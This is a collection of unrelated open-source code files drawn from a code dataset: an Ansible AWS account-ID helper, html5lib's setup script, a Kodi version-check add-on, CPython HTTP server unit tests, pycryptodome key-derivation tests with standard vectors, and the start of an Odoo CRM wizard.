the account should be enough to permit this.
"""
account_id = None
try:
sts_client = module.client('sts')
account_id = sts_client.get_caller_identity().get('Account')
# non-STS sessions may also get NoCredentialsError from this STS call, so
# we must catch that too and try the IAM version
except (ClientError, NoCredentialsError):
try:
iam_client = module.client('iam')
account_id = iam_client.get_user()['User']['Arn'].split(':')[4]
except ClientError as e:
if (e.response['Error']['Code'] == 'AccessDenied'):
except_msg = to_native(e)
# don't match on `arn:aws` because of China region `arn:aws-cn` and similar
account_id = except_msg.search(r"arn:\w+:iam::([0-9]{12,32}):\w+/").group(1)
if account_id is None:
module.fail_json_aws(e, msg="Could not get AWS account information")
except Exception as e:
module.fail_json(
msg="Failed to get AWS account information, Try allowing sts:GetCallerIdentity or iam:GetUser permissions.",
exception=traceback.format_exc()
)
if not account_id:
module.fail_json(msg="Failed while determining AWS account ID. Try allowing sts:GetCallerIdentity or iam:GetUser permissions.")
return to_native(account_id)
| gpl-3.0 |
GreenRecycleBin/servo | tests/wpt/web-platform-tests/tools/html5lib/setup.py | 418 | 1694 | from distutils.core import setup
import os
import codecs
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: HTML'
]
packages = ['html5lib'] + ['html5lib.'+name
for name in os.listdir(os.path.join('html5lib'))
if os.path.isdir(os.path.join('html5lib', name)) and
not name.startswith('.') and name != 'tests']
current_dir = os.path.dirname(__file__)
with codecs.open(os.path.join(current_dir, 'README.rst'), 'r', 'utf8') as readme_file:
with codecs.open(os.path.join(current_dir, 'CHANGES.rst'), 'r', 'utf8') as changes_file:
long_description = readme_file.read() + '\n' + changes_file.read()
setup(name='html5lib',
version='0.9999-dev',
url='https://github.com/html5lib/html5lib-python',
license="MIT License",
description='HTML parser based on the WHATWG HTML specifcation',
long_description=long_description,
classifiers=classifiers,
maintainer='James Graham',
maintainer_email='[email protected]',
packages=packages,
install_requires=[
'six',
],
)
| mpl-2.0 |
chadoe/xbmc | addons/service.xbmc.versioncheck/service.py | 58 | 3959 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import platform
import xbmc
import lib.common
from lib.common import log, dialog_yesno
from lib.common import upgrade_message as _upgrademessage
from lib.common import upgrade_message2 as _upgrademessage2
ADDON = lib.common.ADDON
ADDONVERSION = lib.common.ADDONVERSION
ADDONNAME = lib.common.ADDONNAME
ADDONPATH = lib.common.ADDONPATH
ICON = lib.common.ICON
oldversion = False
class Main:
def __init__(self):
linux = False
packages = []
xbmc.sleep(5000)
if xbmc.getCondVisibility('System.Platform.Linux') and ADDON.getSetting("upgrade_apt") == 'true':
packages = ['kodi']
_versionchecklinux(packages)
else:
oldversion, version_installed, version_available, version_stable = _versioncheck()
if oldversion:
_upgrademessage2( version_installed, version_available, version_stable, oldversion, False)
def _versioncheck():
# initial vars
from lib.jsoninterface import get_installedversion, get_versionfilelist
from lib.versions import compare_version
# retrieve versionlists from supplied version file
versionlist = get_versionfilelist()
# retrieve version installed
version_installed = get_installedversion()
# copmpare installed and available
oldversion, version_installed, version_available, version_stable = compare_version(version_installed, versionlist)
return oldversion, version_installed, version_available, version_stable
def _versionchecklinux(packages):
if platform.dist()[0].lower() in ['ubuntu', 'debian', 'linuxmint']:
handler = False
result = False
try:
# try aptdeamon first
from lib.aptdeamonhandler import AptdeamonHandler
handler = AptdeamonHandler()
except:
# fallback to shell
# since we need the user password, ask to check for new version first
from lib.shellhandlerapt import ShellHandlerApt
sudo = True
handler = ShellHandlerApt(sudo)
if dialog_yesno(32015):
pass
elif dialog_yesno(32009, 32010):
log("disabling addon by user request")
ADDON.setSetting("versioncheck_enable", 'false')
return
if handler:
if handler.check_upgrade_available(packages[0]):
if _upgrademessage(32012, oldversion, True):
if ADDON.getSetting("upgrade_system") == "false":
result = handler.upgrade_package(packages[0])
else:
result = handler.upgrade_system()
if result:
from lib.common import message_upgrade_success, message_restart
message_upgrade_success()
message_restart()
else:
log("Error during upgrade")
else:
log("Error: no handler found")
else:
log("Unsupported platform %s" %platform.dist()[0])
sys.exit(0)
if (__name__ == "__main__"):
log('Version %s started' % ADDONVERSION)
Main()
| gpl-2.0 |
mancoast/CPythonPyc_test | fail/300_test_httpservers.py | 3 | 11640 | """Unittests for the various HTTPServer modules.
Written by Cody A.W. Somerville <[email protected]>,
Josip Dzolonga, and Michael Otteneder for the 2007/08 GHOP contest.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer, \
SimpleHTTPRequestHandler, CGIHTTPRequestHandler
import os
import sys
import base64
import shutil
import urllib.parse
import http.client
import tempfile
import threading
import unittest
from test import support
class NoLogRequestHandler:
def log_message(self, *args):
# don't write log messages to stderr
pass
def read(self, n=None):
return ''
class TestServerThread(threading.Thread):
def __init__(self, test_object, request_handler):
threading.Thread.__init__(self)
self.request_handler = request_handler
self.test_object = test_object
self.test_object.lock.acquire()
def run(self):
self.server = HTTPServer(('', 0), self.request_handler)
self.test_object.PORT = self.server.socket.getsockname()[1]
self.test_object.lock.release()
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self.lock = threading.Lock()
self.thread = TestServerThread(self, self.request_handler)
self.thread.start()
self.lock.acquire()
def tearDown(self):
self.lock.release()
self.thread.stop()
def request(self, uri, method='GET', body=None, headers={}):
self.connection = http.client.HTTPConnection('localhost', self.PORT)
self.connection.request(method, uri, body, headers)
return self.connection.getresponse()
class BaseHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
default_request_version = 'HTTP/1.1'
def do_TEST(self):
self.send_response(204)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
def do_KEEP(self):
self.send_response(204)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'keep-alive')
self.end_headers()
def do_KEYERROR(self):
self.send_error(999)
def do_CUSTOM(self):
self.send_response(999)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
def setUp(self):
BaseTestCase.setUp(self)
self.con = http.client.HTTPConnection('localhost', self.PORT)
self.con.connect()
def test_command(self):
self.con.request('GET', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_request_line_trimming(self):
self.con._http_vsn_str = 'HTTP/1.1\n'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_version_bogus(self):
self.con._http_vsn_str = 'FUBAR'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_digits(self):
self.con._http_vsn_str = 'HTTP/9.9.9'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_none_get(self):
self.con._http_vsn_str = ''
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_version_none(self):
self.con._http_vsn_str = ''
self.con.putrequest('PUT', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_invalid(self):
self.con._http_vsn = 99
self.con._http_vsn_str = 'HTTP/9.9'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 505)
def test_send_blank(self):
self.con._http_vsn_str = ''
self.con.putrequest('', '')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_header_close(self):
self.con.putrequest('GET', '/')
self.con.putheader('Connection', 'close')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_head_keep_alive(self):
self.con._http_vsn_str = 'HTTP/1.1'
self.con.putrequest('GET', '/')
self.con.putheader('Connection', 'keep-alive')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_handler(self):
self.con.request('TEST', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 204)
def test_return_header_keep_alive(self):
self.con.request('KEEP', '/')
res = self.con.getresponse()
self.assertEquals(res.getheader('Connection'), 'keep-alive')
self.con.request('TEST', '/')
def test_internal_key_error(self):
self.con.request('KEYERROR', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 999)
def test_return_custom_status(self):
self.con.request('CUSTOM', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 999)
class SimpleHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, SimpleHTTPRequestHandler):
pass
def setUp(self):
BaseTestCase.setUp(self)
self.cwd = os.getcwd()
basetempdir = tempfile.gettempdir()
os.chdir(basetempdir)
self.data = b'We are the knights who say Ni!'
self.tempdir = tempfile.mkdtemp(dir=basetempdir)
self.tempdir_name = os.path.basename(self.tempdir)
temp = open(os.path.join(self.tempdir, 'test'), 'wb')
temp.write(self.data)
temp.close()
def tearDown(self):
try:
os.chdir(self.cwd)
try:
shutil.rmtree(self.tempdir)
except:
pass
finally:
BaseTestCase.tearDown(self)
def check_status_and_reason(self, response, status, data=None):
body = response.read()
self.assert_(response)
self.assertEquals(response.status, status)
self.assert_(response.reason != None)
if data:
self.assertEqual(data, body)
def test_get(self):
#constructs the path relative to the root directory of the HTTPServer
response = self.request(self.tempdir_name + '/test')
self.check_status_and_reason(response, 200, data=self.data)
response = self.request(self.tempdir_name + '/')
self.check_status_and_reason(response, 200)
response = self.request(self.tempdir_name)
self.check_status_and_reason(response, 301)
response = self.request('/ThisDoesNotExist')
self.check_status_and_reason(response, 404)
response = self.request('/' + 'ThisDoesNotExist' + '/')
self.check_status_and_reason(response, 404)
f = open(os.path.join(self.tempdir_name, 'index.html'), 'w')
response = self.request('/' + self.tempdir_name + '/')
self.check_status_and_reason(response, 200)
if os.name == 'posix':
# chmod won't work as expected on Windows platforms
os.chmod(self.tempdir, 0)
response = self.request(self.tempdir_name + '/')
self.check_status_and_reason(response, 404)
os.chmod(self.tempdir, 0o755)
def test_head(self):
response = self.request(
self.tempdir_name + '/test', method='HEAD')
self.check_status_and_reason(response, 200)
self.assertEqual(response.getheader('content-length'),
str(len(self.data)))
self.assertEqual(response.getheader('content-type'),
'application/octet-stream')
def test_invalid_requests(self):
response = self.request('/', method='FOO')
self.check_status_and_reason(response, 501)
# requests must be case sensitive,so this should fail too
response = self.request('/', method='get')
self.check_status_and_reason(response, 501)
response = self.request('/', method='GETs')
self.check_status_and_reason(response, 501)
cgi_file1 = """\
#!%s
print("Content-type: text/html")
print()
print("Hello World")
"""
cgi_file2 = """\
#!%s
import cgi
print("Content-type: text/html")
print()
form = cgi.FieldStorage()
print("%%s, %%s, %%s" %% (form.getfirst("spam"), form.getfirst("eggs"),\
form.getfirst("bacon")))
"""
class CGIHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, CGIHTTPRequestHandler):
pass
def setUp(self):
BaseTestCase.setUp(self)
self.parent_dir = tempfile.mkdtemp()
self.cgi_dir = os.path.join(self.parent_dir, 'cgi-bin')
os.mkdir(self.cgi_dir)
self.file1_path = os.path.join(self.cgi_dir, 'file1.py')
with open(self.file1_path, 'w') as file1:
file1.write(cgi_file1 % sys.executable)
os.chmod(self.file1_path, 0o777)
self.file2_path = os.path.join(self.cgi_dir, 'file2.py')
with open(self.file2_path, 'w') as file2:
file2.write(cgi_file2 % sys.executable)
os.chmod(self.file2_path, 0o777)
self.cwd = os.getcwd()
os.chdir(self.parent_dir)
def tearDown(self):
try:
os.chdir(self.cwd)
os.remove(self.file1_path)
os.remove(self.file2_path)
os.rmdir(self.cgi_dir)
os.rmdir(self.parent_dir)
finally:
BaseTestCase.tearDown(self)
def test_headers_and_content(self):
res = self.request('/cgi-bin/file1.py')
self.assertEquals((b'Hello World\n', 'text/html', 200), \
(res.read(), res.getheader('Content-type'), res.status))
def test_post(self):
params = urllib.parse.urlencode(
{'spam' : 1, 'eggs' : 'python', 'bacon' : 123456})
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
res = self.request('/cgi-bin/file2.py', 'POST', params, headers)
self.assertEquals(res.read(), b'1, python, 123456\n')
def test_invaliduri(self):
res = self.request('/cgi-bin/invalid')
res.read()
self.assertEquals(res.status, 404)
def test_authorization(self):
headers = {b'Authorization' : b'Basic ' +
base64.b64encode(b'username:pass')}
res = self.request('/cgi-bin/file1.py', 'GET', headers=headers)
self.assertEquals((b'Hello World\n', 'text/html', 200), \
(res.read(), res.getheader('Content-type'), res.status))
def test_main(verbose=None):
try:
cwd = os.getcwd()
support.run_unittest(BaseHTTPServerTestCase,
SimpleHTTPServerTestCase,
CGIHTTPServerTestCase
)
finally:
os.chdir(cwd)
if __name__ == '__main__':
test_main()
| gpl-3.0 |
mrquim/repository.mrquim | repo/script.module.pycryptodome/lib/Crypto/SelfTest/Protocol/test_KDF.py | 5 | 16508 | # -*- coding: utf-8 -*-
#
# SelfTest/Protocol/test_KDF.py: Self-test for key derivation functions
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
from binascii import unhexlify
from Crypto.Util.py3compat import *
from Crypto.SelfTest.st_common import list_test_cases
from Crypto.Hash import SHA1, HMAC, SHA256
from Crypto.Cipher import AES, DES3
from Crypto.Protocol.KDF import PBKDF1, PBKDF2, _S2V, HKDF, scrypt
def t2b(t):
if t is None:
return None
t2 = t.replace(" ", "").replace("\n", "")
return unhexlify(b(t2))
class TestVector(object):
pass
class PBKDF1_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (8 bytes encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",16,1000,"DC19847E05C64D2FAF10EBFB4A3D2A20"),
)
def test1(self):
v = self._testData[0]
res = PBKDF1(v[0], t2b(v[1]), v[2], v[3], SHA1)
self.assertEqual(res, t2b(v[4]))
class PBKDF2_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",24,2048,"BFDE6BE94DF7E11DD409BCE20A0255EC327CB936FFE93643"),
# From RFC 6050
("password","73616c74", 20, 1, "0c60c80f961f0e71f3a9b524af6012062fe037a6"),
("password","73616c74", 20, 2, "ea6c014dc72d6f8ccd1ed92ace1d41f0d8de8957"),
("password","73616c74", 20, 4096, "4b007901b765489abead49d926f721d065a429c1"),
("passwordPASSWORDpassword","73616c7453414c5473616c7453414c5473616c7453414c5473616c7453414c5473616c74",
25, 4096, "3d2eec4fe41c849b80c8d83662c0e44a8b291a964cf2f07038"),
( 'pass\x00word',"7361006c74",16,4096, "56fa6aa75548099dcc37d7f03425e0c3"),
)
def test1(self):
# Test only for HMAC-SHA1 as PRF
def prf(p,s):
return HMAC.new(p,s,SHA1).digest()
for i in xrange(len(self._testData)):
v = self._testData[i]
res = PBKDF2(v[0], t2b(v[1]), v[2], v[3])
res2 = PBKDF2(v[0], t2b(v[1]), v[2], v[3], prf)
self.assertEqual(res, t2b(v[4]))
self.assertEqual(res, res2)
def test2(self):
"""From draft-josefsson-scrypt-kdf-01, Chapter 10"""
output_1 = t2b("""
55 ac 04 6e 56 e3 08 9f ec 16 91 c2 25 44 b6 05
f9 41 85 21 6d de 04 65 e6 8b 9d 57 c2 0d ac bc
49 ca 9c cc f1 79 b6 45 99 16 64 b3 9d 77 ef 31
7c 71 b8 45 b1 e3 0b d5 09 11 20 41 d3 a1 97 83
""")
output_2 = t2b("""
4d dc d8 f6 0b 98 be 21 83 0c ee 5e f2 27 01 f9
64 1a 44 18 d0 4c 04 14 ae ff 08 87 6b 34 ab 56
a1 d4 25 a1 22 58 33 54 9a db 84 1b 51 c9 b3 17
6a 27 2b de bb a1 d0 78 47 8f 62 b3 97 f3 3c 8d
""")
prf_hmac_sha256 = lambda p, s: HMAC.new(p, s, SHA256).digest()
output = PBKDF2(b("passwd"), b("salt"), 64, 1, prf=prf_hmac_sha256)
self.assertEqual(output, output_1)
output = PBKDF2(b("Password"), b("NaCl"), 64, 80000, prf=prf_hmac_sha256)
self.assertEqual(output, output_2)
class S2V_Tests(unittest.TestCase):
# Sequence of test vectors.
# Each test vector is made up by:
# Item #0: a tuple of strings
# Item #1: an AES key
# Item #2: the result
# Item #3: the cipher module S2V is based on
# Everything is hex encoded
_testData = [
# RFC5297, A.1
(
( '101112131415161718191a1b1c1d1e1f2021222324252627',
'112233445566778899aabbccddee' ),
'fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0',
'85632d07c6e8f37f950acd320a2ecc93',
AES
),
# RFC5297, A.2
(
( '00112233445566778899aabbccddeeffdeaddadadeaddadaffeeddcc'+
'bbaa99887766554433221100',
'102030405060708090a0',
'09f911029d74e35bd84156c5635688c0',
'7468697320697320736f6d6520706c61'+
'696e7465787420746f20656e63727970'+
'74207573696e67205349562d414553'),
'7f7e7d7c7b7a79787776757473727170',
'7bdb6e3b432667eb06f4d14bff2fbd0f',
AES
),
]
def test1(self):
"""Verify correctness of test vector"""
for tv in self._testData:
s2v = _S2V.new(t2b(tv[1]), tv[3])
for s in tv[0]:
s2v.update(t2b(s))
result = s2v.derive()
self.assertEqual(result, t2b(tv[2]))
def test2(self):
"""Verify that no more than 127(AES) and 63(TDES)
components are accepted."""
key = bchr(0) * 8 + bchr(255) * 8
for module in (AES, DES3):
s2v = _S2V.new(key, module)
max_comps = module.block_size*8-1
for i in xrange(max_comps):
s2v.update(b("XX"))
self.assertRaises(TypeError, s2v.update, b("YY"))
class HKDF_Tests(unittest.TestCase):
# Test vectors from RFC5869, Appendix A
# Each tuple is made up by:
# Item #0: hash module
# Item #1: secret
# Item #2: salt
# Item #3: context
# Item #4: expected result
_test_vector = (
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"3cb25f25faacd57a90434f64d0362f2a" +
"2d2d0a90cf1a5a4c5db02d56ecc4c5bf" +
"34007208d5b887185865"
),
(
SHA256,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"b11e398dc80327a1c8e7f78c596a4934" +
"4f012eda2d4efad8a050cc4c19afa97c" +
"59045a99cac7827271cb41c65e590e09" +
"da3275600c2f09b8367793a9aca3db71" +
"cc30c58179ec3e87c14c01d5c1f3434f" +
"1d87"
),
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
None,
None,
42,
"8da4e775a563c18f715f802a063c5a31" +
"b8a11f5c5ee1879ec3454e5f3c738d2d" +
"9d201395faa4b61a96c8"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"085a01ea1b10f36933068b56efa5ad81" +
"a4f14b822f5b091568a9cdd4f155fda2" +
"c22e422478d305f3f896"
),
(
SHA1,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"0bd770a74d1160f7c9f12cd5912a06eb" +
"ff6adcae899d92191fe4305673ba2ffe" +
"8fa3f1a4e5ad79f3f334b3b202b2173c" +
"486ea37ce3d397ed034c7f9dfeb15c5e" +
"927336d0441f4c4300e2cff0d0900b52" +
"d3b4"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"",
"",
42,
"0ac1af7002b3d761d1e55298da9d0506" +
"b9ae52057220a306e07b6b87e8df21d0" +
"ea00033de03984d34918"
),
(
SHA1,
"0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c",
None,
"",
42,
"2c91117204d745f3500d636a62f64f0a" +
"b3bae548aa53d423b0d1f27ebba6f5e5" +
"673a081d70cce7acfc48"
)
)
def test1(self):
for tv in self._test_vector:
secret, salt, info, exp = [ t2b(tv[x]) for x in (1,2,3,5) ]
key_len, hashmod = [ tv[x] for x in (4,0) ]
output = HKDF(secret, key_len, salt, hashmod, 1, info)
self.assertEqual(output, exp)
def test2(self):
ref = HKDF(b("XXXXXX"), 12, b("YYYY"), SHA1)
# Same output, but this time split over 2 keys
key1, key2 = HKDF(b("XXXXXX"), 6, b("YYYY"), SHA1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = HKDF(b("XXXXXX"), 4, b("YYYY"), SHA1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
class scrypt_Tests(unittest.TestCase):
# Test vectors taken from
# http://tools.ietf.org/html/draft-josefsson-scrypt-kdf-00
data = (
(
"",
"",
16, # 2K
1,
1,
"""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
"""
),
(
"password",
"NaCl",
1024, # 1M
8,
16,
"""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
"""
),
(
"pleaseletmein",
"SodiumChloride",
16384, # 16M
8,
1,
"""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
"""
),
(
"pleaseletmein",
"SodiumChloride",
1048576, # 1G
8,
1,
"""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
"""
),
)
def setUp(self):
new_test_vectors = []
for tv in self.data:
new_tv = TestVector()
new_tv.P = b(tv[0])
new_tv.S = b(tv[1])
new_tv.N = tv[2]
new_tv.r = tv[3]
new_tv.p = tv[4]
new_tv.output = t2b(tv[5])
new_tv.dkLen = len(new_tv.output)
new_test_vectors.append(new_tv)
self.data = new_test_vectors
def _test1(self):
b_input = t2b("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
""")
b_output = t2b("""
79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
""")
from Crypto.Protocol.KDF import _scryptROMix
output = _scryptROMix(b_input, 16)
self.assertEqual(output, b_output)
def test2(self):
for tv in self.data:
# TODO: add runtime flag to enable test vectors
# with humongous memory usage
if tv.N > 100000:
continue
output = scrypt(tv.P, tv.S, tv.dkLen, tv.N, tv.r, tv.p)
self.assertEqual(output, tv.output)
def test3(self):
ref = scrypt(b("password"), b("salt"), 12, 16, 1, 1)
# Same output, but this time split over 2 keys
key1, key2 = scrypt(b("password"), b("salt"), 6, 16, 1, 1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = scrypt(b("password"), b("salt"), 4, 16, 1, 1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
def get_tests(config={}):
tests = []
tests += list_test_cases(PBKDF1_Tests)
tests += list_test_cases(PBKDF2_Tests)
tests += list_test_cases(S2V_Tests)
tests += list_test_cases(HKDF_Tests)
tests += list_test_cases(scrypt_Tests)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
| gpl-2.0 |
dllsf/odootest | addons/crm_partner_assign/wizard/crm_forward_to_partner.py | 377 | 10606 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class crm_lead_forward_to_partner(osv.TransientModel):
""" Forward info history to partners. """
_name = 'crm.lead.forward.to.partner'
def _convert_to_assignation_line(self, cr, uid, lead, partner, context=None):
lead_location = []
partner_location = []
if lead.country_id:
lead_location.append(lead.country_id.name)
if lead.city:
lead_location.append(lead.city)
if partner:
if partner.country_id:
partner_location.append(partner.country_id.name)
if partner.city:
partner_location.append(partner.city)
return {'lead_id': lead.id,
'lead_location': ", ".join(lead_location),
'partner_assigned_id': partner and partner.id or False,
'partner_location': ", ".join(partner_location),
